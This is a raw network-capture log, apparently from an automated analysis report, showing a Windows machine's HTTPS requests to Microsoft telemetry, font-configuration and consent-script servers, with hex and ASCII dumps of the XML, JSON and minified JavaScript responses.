                                                                                                                                                                                              ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                              x-ms-request-id: c8277487-201e-0051-68a5-3b7340000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123947Z-15b8b599d885ffrhhC1TEBtuv000000004k0000000004ayv
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:47 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              87192.168.2.64981113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:47 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:47 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 405
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                              ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                              x-ms-request-id: ce292e58-401e-00a3-2e0a-3d8b09000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123947Z-178bfbc474bxkclvhC1NYC69g400000005wg000000007f41
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:47 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              88192.168.2.64981313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:47 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:47 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 174
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                              ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                              x-ms-request-id: 5a5a0c5e-c01e-0079-588c-3ae51a000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123947Z-174c587ffdfldtt2hC1TEBwv9c00000004c00000000017gf
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:47 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              89192.168.2.64981923.218.208.109443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:47 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                              2024-11-24 12:39:48 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                              X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                              Cache-Control: public, max-age=161601
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:48 GMT
                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                              2024-11-24 12:39:48 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              90192.168.2.64981613.107.246.634434364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:47 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                              Host: js.monitor.azure.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://learn.microsoft.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-24 12:39:48 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:48 GMT
                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                              Content-Length: 207935
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                              ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                              x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                              x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                              x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              x-azure-ref: 20241124T123948Z-15b8b599d882hxlwhC1TEBfa5w00000004eg000000000sqx
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache-Info: L2_T2
                                                                                                                                                                                              X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:48 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                              Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                                              Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
                                                                                                                                                                                              Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                                              Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                                              Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                                              Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                                              Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                                              Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                                              Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                                              2024-11-24 12:39:48 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
                                                                                                                                                                                              Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              91192.168.2.64981513.107.246.634434364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:47 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                              Host: wcpstatic.microsoft.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://learn.microsoft.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
